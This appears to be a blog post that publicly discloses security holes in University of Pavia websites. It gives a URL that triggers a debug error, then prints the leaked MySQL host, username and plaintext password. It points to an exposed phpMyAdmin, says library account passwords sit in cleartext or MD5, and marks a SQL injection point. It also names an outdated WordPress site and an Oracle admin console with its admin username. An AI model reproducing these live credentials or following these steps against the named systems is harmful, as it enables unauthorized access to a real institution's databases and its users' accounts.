Skip to main content

unipv.it | several system are compromised. Data leak, Misconfiguration, Sql injections, xss.

Simple error that gives full access to the databases (of the biblio?)

We can raise an error by simply changing the value of managerName (I added "a")

http://ecnew.unipv.it/biblionauta/index.php?moduleName=user&managerName=logina&
archived: http://archive.is/ZDYzY

In the long error/debug result we can find several informations we can find the mysql user and passwords.

[type] => mysql_SGL
[host] => mysqlbib.unipv.it
[protocol] => tcp
[socket] =>
[port] => 3306
[user] => frameuser
[pass] => g0nzaga
[name] => framework_ecnew


path  /home/isis/http/htdocs/biblionauta

The mysql server is mysqlbib.unipv.it and it also have an http server with phpmyadmin http://mysqlbib.unipv.it (archived: http://archive.is/3Enl1) - samples  .
In a few words we can easily connect to the databases by using the credentials found in the logs.

Quite easy




We have also other informations regarding other severs where the current box/website, I suppose, makes soap requests.

[easyindexEnable] => 1
[wsdlEasyindex] => http://easyindex.unipv.it/easyindexam/ws/soap/easyindexam.wsdl
[wsdlEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/easycat.wsdl
[serverSoapEasycat] => http://ecnew.unipv.it/biblionauta/ws/soap/SoapServerEasycat.php
[rootSistema] => 4
[acquistaEnable] => 1
[ajaxEasycat] => 1
[ajaxTabellari] =>
[ajaxSerieInv] => 1
[ajaxRfid] => 1
[ajaxFondi] =>
[ajaxContatore] => 1
[ajaxStampaCollocazione] => 1
[topograficoEnable] => 1
[topograficoUrl] => https://mitch.unipv.it:4443/pls/user/MENU_TOPOGRAFICO$.Startup







Other informations regarding the smtp settings
[backend] => sendmail
[sendmailPath] => /usr/sbin/sendmail
[sendmailArgs] => -t -i
[smtpHost] => smtp.tiscali.it
[smtpLocalHost] =>
[smtpPort] => 25
[smtpAuth] => 0
[smtpUsername] =>
[smtpPassword] =>
)

[email] => Array
(
[admin] => polopav@nexusfi.it
[support] => polopav@unipv.it
[info] => polopav@unipv.it



----

All the accounts of the libraries listed in the pdf below are compromised
http://siba.unipv.it/biblioteche/portali/fluxus/doc/Biblioteche-Fluxus.pdf

and the following.
"U0100";"5"
"U0400";"9"
"U0500";"4"
"U0600";"5"
"U0813";"1"
"U0820";"1"
"U0830";"1"
"U0840";"1"
"U1700";"6"
"U1800";"2"
"U1803";"2"
"U1900";"10"
"U2000";"7"
"U2100";"7"
"U2200";"7"
"U2300";"3"
"U2400";"3"
"U2500";"3"
"U2600";"3"
"U2700";"7"
"U2802";"7"
"U2900";"7"
"U3000";"7"
"U3100";"7"
"U3200";"3"
"U3400";"3"
"U3500";"3"
"U4000";"3"
"U4100";"3"
"U4300";"3"
"U4400";"3"
"U4700";"7"
"U5000";"3"
"U6000";"3"
"U6100";"3"
"U7100";"3"
 -


There are several passwords in clear text and several other in md5 hash that can be easily identified.


----------------------


Sql injection, xss, etc in another website

http://opac.unipv.it/easyweb/w3006/index.php?scelta=campi&&biblio=PAV0U7&lang=
http://opac.unipv.it/easyweb/w3006/index.php?scelta=campi&&biblio=[sqli]&lang=
http://archive.is/2FX63

there are several injections, XSS and other stuff. Too many.

----------------------

Code execution and xss in another website

http://openweb.unipv.it
very old wordpress 3.5.1 that could lead to code execution, xss.



----------------------

Oracle application server 10g

https://mitch.unipv.it:4443/
http://archive.is/uk5BB
https://mitch.unipv.it:4443/em/console/ias/cluster/topology
oc4jadmin

----------------------



Comments

Post a Comment

Popular posts from this blog

Moodle 3.8.1+ - path leak via errors in several files

Moodle 3.8.1+ ----------------------------------------------- File: admin/mailout-debugger.php #!/usr/bin/php Notice : Disabled. in \admin\mailout-debugger.php on line 73 File: admin/settings/appearance.php Notice : Undefined variable: hassiteconfig in \admin\settings\appearance.php on line 10 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\appearance.php:10 Stack trace: #0 {main} thrown in \admin\settings\appearance.php on line 10 File: admin/settings/badges.php Notice : Undefined variable: hassiteconfig in \admin\settings\badges.php on line 30 Fatal error : Uncaught Error: Call to undefined function has_any_capability() in \admin\settings\badges.php:30 Stack trace: #0 {main} thrown in \admin\settings\badges.php on line 30 File: admin/settings/courses.php Notice : Undefined variable: hassiteconfig in \admin\settings\courses.php on line 32 Fatal error : Uncaught Error: Call to undefined function
Post a Comment
Read more

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more